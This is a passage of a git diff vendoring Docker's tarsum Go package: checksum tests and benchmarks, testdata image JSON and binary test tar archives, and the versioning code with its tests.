+			t.Errorf("expecting [%s], but got [%s]", layer.tarsum, gotSum)
+		}
+		var expectedHashName string
+		if layer.hash != nil {
+			expectedHashName = layer.hash.Name()
+		} else {
+			expectedHashName = DefaultTHash.Name()
+		}
+		if expectedHashName != ts.Hash().Name() {
+			t.Errorf("expecting hash [%v], but got [%s]", expectedHashName, ts.Hash().Name())
+		}
+	}
+}
+
+func TestIteration(t *testing.T) {
+	headerTests := []struct {
+		expectedSum string // TODO(vbatts) it would be nice to get individual sums of each
+		version     Version
+		hdr         *tar.Header
+		data        []byte
+	}{
+		{
+			"tarsum+sha256:626c4a2e9a467d65c33ae81f7f3dedd4de8ccaee72af73223c4bc4718cbc7bbd",
+			Version0,
+			&tar.Header{
+				Name:     "file.txt",
+				Size:     0,
+				Typeflag: tar.TypeReg,
+				Devminor: 0,
+				Devmajor: 0,
+			},
+			[]byte(""),
+		},
+		{
+			"tarsum.dev+sha256:6ffd43a1573a9913325b4918e124ee982a99c0f3cba90fc032a65f5e20bdd465",
+			VersionDev,
+			&tar.Header{
+				Name:     "file.txt",
+				Size:     0,
+				Typeflag: tar.TypeReg,
+				Devminor: 0,
+				Devmajor: 0,
+			},
+			[]byte(""),
+		},
+		{
+			"tarsum.dev+sha256:b38166c059e11fb77bef30bf16fba7584446e80fcc156ff46d47e36c5305d8ef",
+			VersionDev,
+			&tar.Header{
+				Name:     "another.txt",
+				Uid:      1000,
+				Gid:      1000,
+				Uname:    "slartibartfast",
+				Gname:    "users",
+				Size:     4,
+				Typeflag: tar.TypeReg,
+				Devminor: 0,
+				Devmajor: 0,
+			},
+			[]byte("test"),
+		},
+		{
+			"tarsum.dev+sha256:4cc2e71ac5d31833ab2be9b4f7842a14ce595ec96a37af4ed08f87bc374228cd",
+			VersionDev,
+			&tar.Header{
+				Name:     "xattrs.txt",
+				Uid:      1000,
+				Gid:      1000,
+				Uname:    "slartibartfast",
+				Gname:    "users",
+				Size:     4,
+				Typeflag: tar.TypeReg,
+				Xattrs: map[string]string{
+					"user.key1": "value1",
+					"user.key2": "value2",
+				},
+			},
+			[]byte("test"),
+		},
+		{
+			"tarsum.dev+sha256:65f4284fa32c0d4112dd93c3637697805866415b570587e4fd266af241503760",
+			VersionDev,
+			&tar.Header{
+				Name:     "xattrs.txt",
+				Uid:      1000,
+				Gid:      1000,
+				Uname:    "slartibartfast",
+				Gname:    "users",
+				Size:     4,
+				Typeflag: tar.TypeReg,
+				Xattrs: map[string]string{
+					"user.KEY1": "value1", // adding different case to ensure different sum
+					"user.key2": "value2",
+				},
+			},
+			[]byte("test"),
+		},
+		{
+			"tarsum+sha256:c12bb6f1303a9ddbf4576c52da74973c00d14c109bcfa76b708d5da1154a07fa",
+			Version0,
+			&tar.Header{
+				Name:     "xattrs.txt",
+				Uid:      1000,
+				Gid:      1000,
+				Uname:    "slartibartfast",
+				Gname:    "users",
+				Size:     4,
+				Typeflag: tar.TypeReg,
+				Xattrs: map[string]string{
+					"user.NOT": "CALCULATED",
+				},
+			},
+			[]byte("test"),
+		},
+	}
+	for _, htest := range headerTests {
+		s, err := renderSumForHeader(htest.version, htest.hdr, htest.data)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		if s != htest.expectedSum {
+			t.Errorf("expected sum: %q, got: %q", htest.expectedSum, s)
+		}
+	}
+
+}
+
+func renderSumForHeader(v Version, h *tar.Header, data []byte) (string, error) {
+	buf := bytes.NewBuffer(nil)
+	// first build our test tar
+	tw := tar.NewWriter(buf)
+	if err := tw.WriteHeader(h); err != nil {
+		return "", err
+	}
+	if _, err := tw.Write(data); err != nil {
+		return "", err
+	}
+	tw.Close()
+
+	ts, err := NewTarSum(buf, true, v)
+	if err != nil {
+		return "", err
+	}
+	tr := tar.NewReader(ts)
+	for {
+		hdr, err := tr.Next()
+		if hdr == nil || err == io.EOF {
+			// Signals the end of the archive.
+			break
+		}
+		if err != nil {
+			return "", err
+		}
+		if _, err = io.Copy(ioutil.Discard, tr); err != nil {
+			return "", err
+		}
+	}
+	return ts.Sum(nil), nil
+}
+
+func Benchmark9kTar(b *testing.B) {
+	buf := bytes.NewBuffer([]byte{})
+	fh, err := os.Open("testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar")
+	if err != nil {
+		b.Error(err)
+		return
+	}
+	defer fh.Close()
+
+	n, err := io.Copy(buf, fh)
+	if err != nil {
+		b.Error(err)
+		return
+	}
+
+	reader := bytes.NewReader(buf.Bytes())
+
+	b.SetBytes(n)
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		reader.Seek(0, 0)
+		ts, err := NewTarSum(reader, true, Version0)
+		if err != nil {
+			b.Error(err)
+			return
+		}
+		io.Copy(ioutil.Discard, ts)
+		ts.Sum(nil)
+	}
+}
+
+func Benchmark9kTarGzip(b *testing.B) {
+	buf := bytes.NewBuffer([]byte{})
+	fh, err := os.Open("testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar")
+	if err != nil {
+		b.Error(err)
+		return
+	}
+	defer fh.Close()
+
+	n, err := io.Copy(buf, fh)
+	if err != nil {
+		b.Error(err)
+		return
+	}
+
+	reader := bytes.NewReader(buf.Bytes())
+
+	b.SetBytes(n)
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		reader.Seek(0, 0)
+		ts, err := NewTarSum(reader, false, Version0)
+		if err != nil {
+			b.Error(err)
+			return
+		}
+		io.Copy(ioutil.Discard, ts)
+		ts.Sum(nil)
+	}
+}
+
+// this is a single big file in the tar archive
+func Benchmark1mbSingleFileTar(b *testing.B) {
+	benchmarkTar(b, sizedOptions{1, 1024 * 1024, true, true}, false)
+}
+
+// this is a single big file in the tar archive
+func Benchmark1mbSingleFileTarGzip(b *testing.B) {
+	benchmarkTar(b, sizedOptions{1, 1024 * 1024, true, true}, true)
+}
+
+// this is 1024 1k files in the tar archive
+func Benchmark1kFilesTar(b *testing.B) {
+	benchmarkTar(b, sizedOptions{1024, 1024, true, true}, false)
+}
+
+// this is 1024 1k files in the tar archive
+func Benchmark1kFilesTarGzip(b *testing.B) {
+	benchmarkTar(b, sizedOptions{1024, 1024, true, true}, true)
+}
+
+func benchmarkTar(b *testing.B, opts sizedOptions, isGzip bool) {
+	var fh *os.File
+	tarReader := sizedTar(opts)
+	if br, ok := tarReader.(*os.File); ok {
+		fh = br
+	}
+	defer os.Remove(fh.Name())
+	defer fh.Close()
+
+	b.SetBytes(opts.size * opts.num)
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		ts, err := NewTarSum(fh, !isGzip, Version0)
+		if err != nil {
+			b.Error(err)
+			return
+		}
+		io.Copy(ioutil.Discard, ts)
+		ts.Sum(nil)
+		fh.Seek(0, 0)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json b/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json
new file mode 100644
index 0000000000..48e2af349c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json
@@ -0,0 +1 @@
+{"id":"46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457","parent":"def3f9165934325dfd027c86530b2ea49bb57a0963eb1336b3a0415ff6fd56de","created":"2014-04-07T02:45:52.610504484Z","container":"e0f07f8d72cae171a3dcc35859960e7e956e0628bce6fedc4122bf55b2c287c7","container_config":{"Hostname":"88807319f25e","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["HOME=/","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":["/bin/sh","-c","sed -ri 's/^(%wheel.*)(ALL)$/\\1NOPASSWD: \\2/' /etc/sudoers"],"Image":"def3f9165934325dfd027c86530b2ea49bb57a0963eb1336b3a0415ff6fd56de","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":[]},"docker_version":"0.9.1-dev","config":{"Hostname":"88807319f25e","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["HOME=/","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":null,"Image":"def3f9165934325dfd027c86530b2ea49bb57a0963eb1336b3a0415ff6fd56de","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":[]},"architecture":"amd64","os":"linux","Size":3425}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar
new file mode 100644
index 0000000000000000000000000000000000000000..dfd5c204aea77673f13fdd2f81cb4af1c155c00c
GIT binary patch
literal 9216
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

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/json b/vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/json
new file mode 100644
index 0000000000..af57be01ff
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/json
@@ -0,0 +1 @@
+{"id":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158","comment":"Imported from -","created":"2013-06-13T14:03:50.821769-07:00","container_config":{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":null},"docker_version":"0.4.0","architecture":"x86_64","Size":0}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/layer.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/layer.tar
new file mode 100644
index 0000000000000000000000000000000000000000..880b3f2c56a3e5e42a7db3b7cc020f95c15104a6
GIT binary patch
literal 1536
zcmdPXXP`MSFfcJNH#KE2fB<wFB+6iDWN2z;Vr*z;3{q!qVra~uU`lhB0WBykE=eo`
aT1ly0=$@n0yixt5Aut*Oqai@!5C8x-dJkIw

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-0.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-0.tar
new file mode 100644
index 0000000000000000000000000000000000000000..1c636b3bc7647b67e25e8258a8b08f577ee7ffd4
GIT binary patch
literal 10240
zcmeIxF$zL441nRxo}x!c``UT|2RBD?tYATKdaa({s_<}mI29`VSyBj1!&j28w~KTR
zZ4tefmh3j@cYc*xM6u4Rv)=pYM6I245~H2xdbhuqnr36<aZa_C^%sBD*KZD8$!V@-
zGxUfI*HIu3w*Mj6&;C31zvH(rt@nrH?!^8t9vl!r009ILKmY**5I_I{1Q0*~0R#|0
Y009ILKmY**5I_I{1Q0*~fqxTt0#kD-)Bpeg

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-1.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-1.tar
new file mode 100644
index 0000000000000000000000000000000000000000..b411be9785765b4dd9a4131e409bbfa6c1830ee4
GIT binary patch
literal 10240
zcmeIxF$zL441nRxo}x!c``UT|2RBD?tYATKdaa({s_<}mI29`VSyBj1!&j28w~KTR
zZ4tefmh3j@cYc*xM6u4Rv)+ebMXjCGiP6q;z1!bQO|vobIHy|6`isBn>o<q4><`D?
zX*2YQ4A)U054Qh4y3hVk?0?5^Us~rh*TViU9vl!r009ILKmY**5I_I{1Q0*~0R#|0
Y009ILKmY**5I_I{1Q0*~fqxTt0{2EK)Bpeg

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-2.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-2.tar
new file mode 100644
index 0000000000000000000000000000000000000000..7b5c04a9644808851fcccab5c3c240bf342abd93
GIT binary patch
literal 10240
zcmeIuF%E+;425COJw=XS2L~?Dp<74P5hRe1I+e8NZ(w35>V(Abzr};)<mnry=O711
zOKNv1!<wYqxvWZRvFIAjJtY%0t29c`gL|#dzvtY&LXc12<vj2I_;0^|dFsvW-d-P<
zQ&*%M0tg_000IagfB*srAb<b@2q1s}0tg_000IagfB*srAb<b@2q1s}0tg_0zz=~h
D#i|sa

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-3.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-3.tar
new file mode 100644
index 0000000000000000000000000000000000000000..f8c64586d2dcc4d38a87df60e86658d38ff39c92
GIT binary patch
literal 10240
zcmeIuF%E+;425COJw=XS2NTW{q#_|Pk-+&$J9PkcLSp#e;=ywA^iA{fmYbt3$z9s8
zq1WH}S+yjw=o-!4QxrApw3DDW_xe7+m73QOWFK>_<@(2e`|Ha`Z>GG~@_KYd${~ON
w0tg_000IagfB*srAb<b@2q1s}0tg_000IagfB*srAb<b@2q1s}0tlQ495R;`HUIzs

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/json b/vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/json
new file mode 100644
index 0000000000..288441a940
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/json
@@ -0,0 +1 @@
+{"id":"4439c3c7f847954100b42b267e7e5529cac1d6934db082f65795c5ca2e594d93","parent":"73b164f4437db87e96e90083c73a6592f549646ae2ec00ed33c6b9b49a5c4470","created":"2014-05-16T17:19:44.091534414Z","container":"5f92fb06cc58f357f0cde41394e2bbbb664e663974b2ac1693ab07b7a306749b","container_config":{"Hostname":"9565c6517a0e","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["HOME=/","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":["/bin/sh","-c","setcap 'cap_setgid,cap_setuid+ep' ./file \u0026\u0026 getcap ./file"],"Image":"73b164f4437db87e96e90083c73a6592f549646ae2ec00ed33c6b9b49a5c4470","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":[]},"docker_version":"0.11.1-dev","config":{"Hostname":"9565c6517a0e","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["HOME=/","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":null,"Image":"73b164f4437db87e96e90083c73a6592f549646ae2ec00ed33c6b9b49a5c4470","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":[]},"architecture":"amd64","os":"linux","Size":0}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/layer.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/layer.tar
new file mode 100644
index 0000000000000000000000000000000000000000..819351d42f41430bf402b3c672b571e3eaf8b095
GIT binary patch
literal 2560
zcmWGYtnf%pOi3*&)-yCRu(Z@q%gjk-pe`_g00tbifq}UpgQ1bJv8joPiJ_SpgMp!u
zxuGe8LIri5f!(yy;*!K7pwqC+5-*DGIpTE=s7h0Fg<xk7PoGG=io}wVBE90&<kF(d
zl1jbg#Dc`6%p4%omXU#h=>VE5xzPBd+@To)G|2840byWhU|?oqf;;~Mb02E{2kHRk
de~R-YhD)#rjPU%AB}7JrMnhmU1V%^*0091(G-Ch&

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go
new file mode 100644
index 0000000000..2882286854
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go
@@ -0,0 +1,150 @@
+package tarsum
+
+import (
+	"archive/tar"
+	"errors"
+	"sort"
+	"strconv"
+	"strings"
+)
+
+// Version is used for versioning of the TarSum algorithm
+// based on the prefix of the hash used
+// i.e. "tarsum+sha256:e58fcf7418d4390dec8e8fb69d88c06ec07039d651fedd3aa72af9972e7d046b"
+type Version int
+
+// Prefix of "tarsum"
+const (
+	Version0 Version = iota
+	Version1
+	// VersionDev this constant will be either the latest or an unsettled next-version of the TarSum calculation
+	VersionDev
+)
+
+// VersionLabelForChecksum returns the label for the given tarsum
+// checksum, i.e., everything before the first `+` character in
+// the string or an empty string if no label separator is found.
+func VersionLabelForChecksum(checksum string) string {
+	// Checksums are in the form: {versionLabel}+{hashID}:{hex}
+	sepIndex := strings.Index(checksum, "+")
+	if sepIndex < 0 {
+		return ""
+	}
+	return checksum[:sepIndex]
+}
+
+// GetVersions gets a list of all known tarsum versions.
+func GetVersions() []Version {
+	v := []Version{}
+	for k := range tarSumVersions {
+		v = append(v, k)
+	}
+	return v
+}
+
+var (
+	tarSumVersions = map[Version]string{
+		Version0:   "tarsum",
+		Version1:   "tarsum.v1",
+		VersionDev: "tarsum.dev",
+	}
+	tarSumVersionsByName = map[string]Version{
+		"tarsum":     Version0,
+		"tarsum.v1":  Version1,
+		"tarsum.dev": VersionDev,
+	}
+)
+
+func (tsv Version) String() string {
+	return tarSumVersions[tsv]
+}
+
+// GetVersionFromTarsum returns the Version from the provided string.
+func GetVersionFromTarsum(tarsum string) (Version, error) {
+	tsv := tarsum
+	if strings.Contains(tarsum, "+") {
+		tsv = strings.SplitN(tarsum, "+", 2)[0]
+	}
+	for v, s := range tarSumVersions {
+		if s == tsv {
+			return v, nil
+		}
+	}
+	return -1, ErrNotVersion
+}
+
+// Errors that may be returned by functions in this package
+var (
+	ErrNotVersion            = errors.New("string does not include a TarSum Version")
+	ErrVersionNotImplemented = errors.New("TarSum Version is not yet implemented")
+)
+
+// tarHeaderSelector is the interface which different versions
+// of tarsum should use for selecting and ordering tar headers
+// for each item in the archive.
+type tarHeaderSelector interface {
+	selectHeaders(h *tar.Header) (orderedHeaders [][2]string)
+}
+
+type tarHeaderSelectFunc func(h *tar.Header) (orderedHeaders [][2]string)
+
+func (f tarHeaderSelectFunc) selectHeaders(h *tar.Header) (orderedHeaders [][2]string) {
+	return f(h)
+}
+
+func v0TarHeaderSelect(h *tar.Header) (orderedHeaders [][2]string) {
+	return [][2]string{
+		{"name", h.Name},
+		{"mode", strconv.FormatInt(h.Mode, 10)},
+		{"uid", strconv.Itoa(h.Uid)},
+		{"gid", strconv.Itoa(h.Gid)},
+		{"size", strconv.FormatInt(h.Size, 10)},
+		{"mtime", strconv.FormatInt(h.ModTime.UTC().Unix(), 10)},
+		{"typeflag", string([]byte{h.Typeflag})},
+		{"linkname", h.Linkname},
+		{"uname", h.Uname},
+		{"gname", h.Gname},
+		{"devmajor", strconv.FormatInt(h.Devmajor, 10)},
+		{"devminor", strconv.FormatInt(h.Devminor, 10)},
+	}
+}
+
+func v1TarHeaderSelect(h *tar.Header) (orderedHeaders [][2]string) {
+	// Get extended attributes.
+	xAttrKeys := make([]string, len(h.Xattrs))
+	for k := range h.Xattrs {
+		xAttrKeys = append(xAttrKeys, k)
+	}
+	sort.Strings(xAttrKeys)
+
+	// Make the slice with enough capacity to hold the 11 basic headers
+	// we want from the v0 selector plus however many xattrs we have.
+	orderedHeaders = make([][2]string, 0, 11+len(xAttrKeys))
+
+	// Copy all headers from v0 excluding the 'mtime' header (the 5th element).
+	v0headers := v0TarHeaderSelect(h)
+	orderedHeaders = append(orderedHeaders, v0headers[0:5]...)
+	orderedHeaders = append(orderedHeaders, v0headers[6:]...)
+
+	// Finally, append the sorted xattrs.
+	for _, k := range xAttrKeys {
+		orderedHeaders = append(orderedHeaders, [2]string{k, h.Xattrs[k]})
+	}
+
+	return
+}
+
+var registeredHeaderSelectors = map[Version]tarHeaderSelectFunc{
+	Version0:   v0TarHeaderSelect,
+	Version1:   v1TarHeaderSelect,
+	VersionDev: v1TarHeaderSelect,
+}
+
+func getTarHeaderSelector(v Version) (tarHeaderSelector, error) {
+	headerSelector, ok := registeredHeaderSelectors[v]
+	if !ok {
+		return nil, ErrVersionNotImplemented
+	}
+
+	return headerSelector, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go
new file mode 100644
index 0000000000..88e0a5783c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go
@@ -0,0 +1,98 @@
+package tarsum
+
+import (
+	"testing"
+)
+
+func TestVersionLabelForChecksum(t *testing.T) {
+	version := VersionLabelForChecksum("tarsum+sha256:deadbeef")
+	if version != "tarsum" {
+		t.Fatalf("Version should have been 'tarsum', was %v", version)
+	}
+	version = VersionLabelForChecksum("tarsum.v1+sha256:deadbeef")
+	if version != "tarsum.v1" {
+		t.Fatalf("Version should have been 'tarsum.v1', was %v", version)
+	}
+	version = VersionLabelForChecksum("something+somethingelse")
+	if version != "something" {
+		t.Fatalf("Version should have been 'something', was %v", version)
+	}
+	version = VersionLabelForChecksum("invalidChecksum")
+	if version != "" {
+		t.Fatalf("Version should have been empty, was %v", version)
+	}
+}
+
+func TestVersion(t *testing.T) {
+	expected := "tarsum"
+	var v Version
+	if v.String() != expected {
+		t.Errorf("expected %q, got %q", expected, v.String())
+	}
+
+	expected = "tarsum.v1"
+	v = 1
+	if v.String() != expected {
+		t.Errorf("expected %q, got %q", expected, v.String())
+	}
+
+	expected = "tarsum.dev"
+	v = 2
+	if v.String() != expected {
+		t.Errorf("expected %q, got %q", expected, v.String())
+	}
+}
+
+func TestGetVersion(t *testing.T) {
+	testSet := []struct {
+		Str      string
+		Expected Version
+	}{
+		{"tarsum+sha256:e58fcf7418d4390dec8e8fb69d88c06ec07039d651fedd3aa72af9972e7d046b", Version0},
+		{"tarsum+sha256", Version0},
+		{"tarsum", Version0},
+		{"tarsum.dev", VersionDev},
+		{"tarsum.dev+sha256:deadbeef", VersionDev},
+	}
+
+	for _, ts := range testSet {
+		v, err := GetVersionFromTarsum(ts.Str)
+		if err != nil {
+			t.Fatalf("%q : %s", err, ts.Str)
+		}
+		if v != ts.Expected {
+			t.Errorf("expected %d (%q), got %d (%q)", ts.Expected, ts.Expected, v, v)
+		}
+	}
+
+	// test one that does not exist, to ensure it errors
+	str := "weak+md5:abcdeabcde"
+	_, err := GetVersionFromTarsum(str)
+	if err != ErrNotVersion {
+		t.Fatalf("%q : %s", err, str)
+	}
+}
+
+func TestGetVersions(t *testing.T) {
+	expected := []Version{
+		Version0,
+		Version1,
+		VersionDev,
+	}
+	versions := GetVersions()
+	if len(versions) != len(expected) {
+		t.Fatalf("Expected %v versions, got %v", len(expected), len(versions))
+	}
+	if !containsVersion(versions, expected[0]) || !containsVersion(versions, expected[1]) || !containsVersion(versions, expected[2]) {
+		t.Fatalf("Expected [%v], got [%v]", expected, versions)
+	}
+}
+
+func containsVersion(versions []Version, version Version) bool {
+	for _, v := range versions {
+		if v == version {
+			return true
+		}
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go
new file mode 100644
index 0000000000..9727ecde3e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go
@@ -0,0 +1,22 @@
+package tarsum
